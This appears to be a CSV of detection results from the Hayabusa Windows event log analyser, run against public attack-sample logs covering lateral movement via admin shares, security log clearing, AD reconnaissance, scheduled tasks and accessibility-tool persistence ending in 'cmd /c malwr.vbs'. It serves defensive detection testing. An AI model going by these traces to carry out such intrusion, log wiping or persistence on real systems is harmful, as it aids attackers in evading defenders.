+2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Fonts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Media\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\setup.bat  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\setup.bat  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\wodCmdTerm.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\wodCmdTerm.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\ui\SwDRM.dll  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\wodCmdTerm.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$  :  Workstation:   :  IP Address: fe80::79bf:8ee2:433c:2567  :  Port: 55585  :  LogonID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49244  :  LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49249  :  LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation: PC01  :  IP Address: 10.0.2.17  :  Port: 49249  :  LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49249  :  LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$  :  Workstation:   :  IP Address: fe80::79bf:8ee2:433c:2567  :  Port: 55872  :  LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49222  :  LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$  :  Workstation:   :  IP Address: fe80::79bf:8ee2:433c:2567  :  Port: 55873  :  LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$  :  Share Name: \\*\SYSVOL  :  Share Path: \??\C:\Windows\SYSVOL\sysvol  :  IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation WIN-77LTAPHIQ1R  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: NULL  :  IP Address: 10.0.2.17  :  Port: 49236  :  LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator  :  LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49236  :  LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator  :  LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49237  :  LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator  :  LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
+2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\CYAlyNSS.tmp  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\CYAlyNSS.tmp  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\CYAlyNSS.tmp  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\CYAlyNSS.tmp  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation WIN-77LTAPHIQ1R  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$  :  Workstation:   :  IP Address: fe80::79bf:8ee2:433c:2567  :  Port: 56034  :  LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs  :  Path: C:\Windows\System32\cmd.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
